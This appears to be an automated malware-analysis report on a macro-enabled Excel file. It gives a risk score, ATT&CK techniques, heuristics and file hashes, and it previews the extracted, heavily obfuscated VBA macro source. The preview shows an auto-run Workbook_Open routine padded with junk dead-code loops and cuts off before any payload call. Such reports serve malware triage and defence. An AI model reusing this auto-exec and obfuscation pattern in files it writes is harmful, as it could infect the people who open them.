MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The OOXML file contains a Workbook_Open VBA macro, a common technique for executing malicious code upon opening. The macro uses a Shell() call and CreateObject, indicating it attempts to run external commands or scripts. While the VBA code is heavily obfuscated and truncated, the presence of these functions strongly suggests it is designed to download and execute a second-stage payload.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17158 bytes |
SHA-256: 2dfc6abb73b33a561504b9b40d2513638e534374fe8f1d6ec1f46f7e659fb984 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
I7cC.i7NeBwQhFFnZx9NKX_Av
While 16 = 9114
Dim IVicYSfOFZiOQHEGrBYNE7keyRm4zP1Dd8CLWt_r As Variant
Wend
Dim OBaogWGo3FbUju As Integer
While 6 = 5258
Dim pKtCnFplXzieuR_2t87q8Ce58aI7AswecrQ1bS_8AmmjEAkxj_VdW3 As Variant
Wend
Dim wloxDK6sjoC As Integer
While 17 = 7224
Dim CBBALYZ29oTY5y7yTV_VRFi5nKmN3BQB7gB9hwVj6kXLaLs9FVjVjR As Variant
Wend
Dim t6aFUAuJ97W As Integer
While 15 = 686
Dim RaWv7Og9YZpqVbaanFeZ5ZnvEgaZTxtlayHtULIEBVI2CMDm4iFDbea As Variant
Wend
Dim wjoYxEnkoDN As Integer
While 15 = 3289
Dim gSp_a7YWhPvs1bwetqoH6VP7ufsQ5qhK99fS As Variant
Wend
Dim MdnFCF3j_1 As Integer
While 5 = 8280
Dim w6_j33_4RICrS4LGbzqjt25cQOBhEycp63rvPTwnJDoVPd As Variant
Wend
Dim It35nB2YE5Af As Integer
While 2 = 3152
Dim Qm1axcpUuYJYzFBBXoKhKw_PnJJZwfwwutBIwsOKo4rtibDf_zAZ As Variant
Wend
Dim raSdgivmROhNlVn As Integer
While 23 = 7598
Dim D2MnY_3QDTqJEmZ7dV_SYgkM7k3YTbFKx9aFkV_qhBZL1jfny As Variant
Wend
Dim ksOQTnfP_pwFc6 As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "I7cC"
Dim J2O9OQitV4ajO8Bb8BcnPBz1dRrJQQNFNdTVkFsZI_R9tJZmWG3eGuiHBXd6hXa_oSTtmn1zRBdJr1ER As String
Function jMeVFJRUGUVuWFXVU_Misr13cS5yko(uKyQ_4dX3aIk1Dvhj_ddnGww84KgaQjSl6XbRSaSzFXjfUY4KVOV5dMmXBSEq67jzy94nSNOmJnfrKPlcQU_BMXGruCO_Tk3IwtpUeO2F9sszp4KupkYj1hlZ1)
While 21 = 2867
Dim BSdRHvzXV_O7Ahb82YAWOQ7ArKVsSkrTf_k_iokHX As Variant
Wend
Dim Sx55zm44eEVmoi As Integer
While 11 = 9239
Dim tVbj6YFDuV5Y_6WWKw295bA_2hbxxdUp1Z1qEDorQOBh_Ym7eF3 As Variant
Wend
Dim huomPTWrV7QOOAM As Integer
While 22 = 8560
Dim gh_oQGGIqoZb_a5dRpkv5KwjVrUQu__ufv2D2yxuZ As Variant
Wend
Dim j88z1QPaa9hnNQ As Integer
Dim WpbzoTWRUglL8LYlC_I1DKBSMLEAvCd5NpNZqKgszJZyd6KJfVHCumyJnGkbMUfRBp7P885zaZ_2
While 3 = 1235
Dim UtcRiuzXqon5Rhzlb1zTSLytdYDyRAZFQ As Variant
Wend
Dim cfSWfN9jKPQJ59q As Integer
While 2 = 100
Dim kyepw38H5sxHp_EoMfmxBfM5k1tG5fhhYVMbdsS As Variant
Wend
Dim XeVWmqEQiEjDnQI As Integer
While 13 = 5099
Dim oDjiD5GyLWJOrSvlJcKMRnGjMeiJATb3ON As Variant
Wend
Dim pH24nWPoI_baV7w As Integer
Dim RN5X1vPPgWnpvOE_VdaRiXIYSEQpqsTRmv__rFjzpJ5gRkzv3WbIqJX3Dd_tcjhxCUC_NEPN4kkXclFrNdwROJjbWE5MByVEkEd7hzgwELNEh9YaWVd8vOg1tjlGICLDNdvWFHIX6_KC5d
While 3 = 2496
Dim cXiaD1_6_UhU7x24Q_blltPxx7mcFGvHl As Variant
Wend
Dim Vg53ZJWpL2gEB As Integer
While 4 = 6044
Dim R1Q_IZ3SJrGtmFLex1iXsiO7AzxD6X2r As Variant
Wend
Dim rumuKA7TNQKxvGw As Integer
While 12 = 9144
Dim DIIW_8pQrkTDSlyVuzXB1baSv4MIZWZI3Cs4vA2tAc5I17lrY4Z7WE5krzk As Variant
Wend
Dim tf1TIIIP24jt8nA As Integer
While 5 = 2863
Dim WfPaxQdte7bvvFGJ5Xv_dkj_pwUzdSp8r_gDaWvwNuTV As Variant
Wend
Dim pWVHtsoTKneu6Ou As Integer
While 25 = 9617
Dim A5nOKPcCqiCrgl9urOLRRYKEtnTvDhuGJlu1idHELSoip_FrK3wes7aksh As Variant
Wend
Dim dg5p9Hx4g4 As Integer
While 25 = 8984
Dim FJLFEE9tlXsfljJuNXMJHGA_kJeSetvbL1Dq As Variant
Wend
Dim iXl1azFHuAQ As Integer
Set
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 49152 bytes |
SHA-256: bf04f5505a062ef72114c3c98a6710539388338679ad57ff230efdb01fba4b48 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.